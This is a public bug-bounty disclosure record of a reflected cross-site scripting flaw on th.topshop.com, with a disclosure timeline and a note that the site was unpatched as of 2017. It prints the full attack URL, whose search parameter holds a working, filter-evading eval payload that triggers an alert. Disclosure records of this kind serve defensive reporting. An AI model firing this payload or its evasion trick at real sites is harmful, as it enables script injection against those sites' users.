th.topshop.com XSS vulnerability

2015-07-30T02:44:00
ID OBB:76695
Type openbugbounty
Reporter nopernik
Modified 2015-07-30T02:46:00

Description

Vulnerable URL:
http://th.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;="-eval("al"%2b"e"%2b"rt(\"xssposed\")")()-"&geoip;=noredirect
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check th.topshop.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 30 July, 2015 02:44 GMT
Vulnerability existence verified and confirmed| 30 July, 2015 02:46 GMT